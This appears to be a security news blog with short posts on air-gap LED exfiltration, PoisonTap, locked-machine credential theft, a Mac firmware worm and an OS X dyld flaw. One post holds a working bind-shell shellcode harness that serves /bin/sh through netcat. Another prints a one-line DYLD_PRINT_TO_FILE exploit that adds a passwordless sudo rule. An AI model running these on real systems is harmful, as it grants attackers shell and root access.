Mrz 17 23

In this new paper title „LED-it-GO: Leaking (a lot of) Data from Air-Gapped Computers via the (small) Hard Drive LED“ researchers at Ben-Gurion University Cyber Security Research Center present a method how data can be stolen with a maximum bit rate of 4000 bits per second from an isolated „air-gapped“ computer’s hard drive reading the pulses of light on the LED drive using various types of cameras and light sensors.

Find out more:
* Cameras can Steal Data from Computer Hard Drive LED Lights
* PDF version of the paper
* LED-it-GO – youtube video

written by d45id \\ tags: , , , , , ,

Nov 16 17

poisontapSamy Kamkar released an amazing new tool suite for Raspberry Pi Zero which can siphons cookies, exposes the internal router and installs a persitend web-based backdoor on your locked computers.

Project site: https://samy.pl/poisontap/
Source code: https://github.com/samyk/poisontap

written by d45id \\ tags: , , , , , ,

Sep 16 08

passwdSecurity researcher Robert Fuller discovered an attack method with which Windows and Mac user credentials can be stolen from a locked machine.
This attack is affected against actual Windows and Mac OS computers on which the user has already logged in.

The researcher used USB-based Ethernet dongles like USB Armory or Hak5 Turtle , for which he modified the firmware code to run special software that sets the plug-and-play USB device as the network gateway, DNS, and WPAD servers on the computer it’s connected to.
Find out more:

written by d45id \\ tags: , , , , , ,

Jul 16 06
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdio.h>
#include <string.h>
 
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
 
unsigned char code[] = \
 
#define PORT "\x39\x39"
// Keep to two bytes
 
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
;
 
int main ()
{
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %d Bytes Long\n", strlen(code));
 
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
 
	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
		"call code");
	return 0;
}

written by d45id \\ tags: , , , ,

Sep 15 28

written by d45id \\ tags: , , ,

Aug 15 04

DYLD_PRINT_TO_FILEOh no, only a couple of days after OS X  a privilege escalation vulnerability in OS X 10.10 was discovered a researcher at Malwarebytes spot a new adware installer that uses DYLD_PRINT_TO_FILE exploit.

What you can do?

  • wait until Apple released a security update while you get p0wned
  • install SUIDGuard – A kernel extension adding mitigations to protect SUID/SGID binaries

written by d45id \\ tags: , , , , ,

Aug 15 03

Kovah, who discovered with his partners a lot of firmware vulnerabilities in Macs  last year has now designed with Trammell Hudson, a security engineer a worm they dubbed Thunderstrike 2 that can spread between MacBooks undetected.

[The attack is] really hard to detect, it’s really hard to get rid of, and it’s really hard to protect against something that’s running inside the firmware

Find out more at BlackHat & DefCon or read an amazing article @wired

written by d45id \\ tags: , , , , , , , ,

Jul 15 23

alertSecurity expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

OS X 10.11 pre release candidate is not vulnerable. For all the people who want to fix the problem as soon as possible a patch was published by Esser.

written by d45id \\ tags: , , , , , , , , ,